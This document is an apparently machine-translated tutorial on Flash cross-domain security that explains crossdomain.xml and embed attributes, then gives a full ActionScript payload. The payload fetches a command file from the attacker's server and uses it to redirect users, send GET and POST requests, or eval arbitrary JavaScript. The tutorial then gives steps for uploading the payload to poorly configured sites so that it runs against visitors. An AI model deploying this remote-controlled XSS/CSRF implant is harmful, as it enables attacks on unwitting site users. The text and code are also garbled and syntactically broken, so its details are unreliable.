Using FLASH to access the network causes XSS, CSRF, etc.

Using FLASH to access the network causes XSS, CSRF, etc.

Server crossdomain. the only cross-origin restriction policy for xml file flash is crossdomain. xml file, so we have to explain crossdomain. what is xml. when the file is located, SWF first checks. If not, the access fails. If crossdomain. if the xml file exists and allow exists, the communication is normal. The key to enabling Flash to transmit data across domains is crossdomain. xml. Generally, this file is stored in the root directory, which is called the "Master policy file". It affects the entire website. It can also be stored in a directory separately, only affecting this directory. crossdomain. xml must strictly abide by the XML syntax, and has only one root node, cross-domain-policy, and does not contain any attributes. the root node can only contain the following subnodes: site-control, allow-access-from, allow-access-from-identity, and allow-http-request-headers-from.

The following describes the first two important sub-nodes: site-control: the tag has only the attributes permitted-cross-domain-policies: whether to allow loading of other policy files. none: you cannot use the loadPolicyFile method to load any policy file, including this primary policy file. Master-only: only master policy files can be used [default value]. By-content-type: only the file whose Content-Type is text/x-cross-domain-policy in HTTP/HTTPS protocol can be loaded using the loadPolicyFile method as the cross-domain policy file. By-ftp-filename: only the file named crossdomain. xml under the FTP protocol can be loaded using the loadPolicyFile method as the Cross-Domain Policy file. All: You can use the loadPolicyFile method to load any file in the target domain as a cross-domain policy file. allow-access-from: Check the attribute value of this node, confirm the source domain of the flash file that can read the content of this domain. Domain: This attribute specifies an exact IP address, an exact domain, or a wildcard domain (any domain ). Only the specified domain in the domain has the permission to read the content in the domain through flash. To-ports: indicates the range of socket connection ports that allow access to the content of the domain. You can use the to-ports = "1100,1120-1125" format to limit the port range, or use the wildcard (*) to allow all ports to secure: this attribute value indicates whether the information is encrypted. in simple terms, ActionScript is the code used to create flash files, just like C ++ is used to create software. through ActionScript, we can do a lot of things, which is often the need to trigger vulnerabilities. it is conceivable how terrible a website is if it is not limited to uploaded flash files. III. client html code: the tag has two attributes: AllowScriptAccess and allowNetworking. allowScriptAccess controls the communication between flash and html pages. Optional values include: always // do not impose any restrictions on the communication with html, that is, the execution of javascript. sameDomain // only allows the communication between flash and html from the current domain, this is the default value never // absolutely prohibit the communication between flash and the page allowNetworking to control the communication between flash and the external network. Optional values include: all // allow all network communication, the default value is internal // flash. It cannot communicate with the browser, for example, navigateToURL, but other APInone can be called. // disable any network communication. instance, use the AllowScriptAccess attribute and allowNetworking attribute to set improperly, and use actionscript to create malicious flash:

Import flash.net. *; var param: Object = root. loaderInfo. parameters; var value: String = param ["Custom parameter name"]; // read the parameter var myloader = new URLLoader (new URLRequest (value) through URL )); // create a URL reader myloader. addEventListener (Event. COMPLETE, go); // set the time listener. When the read is COMPLETE, execute the go function myloader. load (); function go (event: Event) {var ResponseText: String = myloader. data; var array_Response: Array = ResponseText. replace ("\ r ",""). split ("\ n"); // split it into a row (line I is line I) for (var I = 0; I var cmd: String = array_Response.substr (0, 1 ); // read the first letter, representing the command var urlbody: String = array_Response.substr (2); switch (cmd) {case "0": // jump to var url_0: String = urlbody; navigateToURL (new URLRequest (url_0), "_ self"); break; case "1": // In the new window, open var url_1: String = urlbody; navigateToURL (new URLRequest (url_1), "_ blank"); break; case "2": // GET var url_2 = new URLRequest (urlbody); url_2.method = "GET "; sendToURL (url_2); break; case "3": // POST var array_url_3: Array = urlbody. split (","); // partition the post data var url_3 = new URLRequest (array_url_3 [0]); var var_3 = new URLVariables (); url_3.method = "POST"; var_3 = array_url_3 [1]; url_3.data = var_3; sendToURL (url_3); break; case "4": // run JS var code: String = urlbody; flash. external. externalInterface. call ("eval", code); break; default: break ;}} stop ();}

After using the code above to create a swf file, upload the file to some websites with poor settings. 5. usage: Applicable objects: for example, some websites whose AllowScriptAccess attributes and allowNetworking attributes are not strictly set, such as setting them to allways or all, indicate that flash can interact with html pages and communicate with networks. at this time, the swf you uploaded can play a role. upload swf and txt files to your server. The embed swf file has a website with vulnerabilities. example :***. swf? The custom parameter name is http: // yoursite/***. txt. If it is filtered, it is replaced with ***. swf? Custom parameter name = http: // yoursite /***. txt &***. swftxt File Format:, [, data] defaults 0 -- jump URL1 -- open window2 -- send GET Request3 -- send POST Request4 -- Call JavaScript. What can I do... XSS and CSRF can be used. For example, if you customize a blog homepage and upload a swf, it will be triggered when someone else browses this page. 6. summary flash Vulnerability exploitation is far more than this. Apart from using the AllowScriptAccess attribute and allowNetworking attribute to improperly set and upload malicious swf, you can also use crossdomain. improper xml file setup and official swf vulnerabilities execute flashxss, CSRF, and so on, while crossdomain. xml files are generally public. I am still studying it ....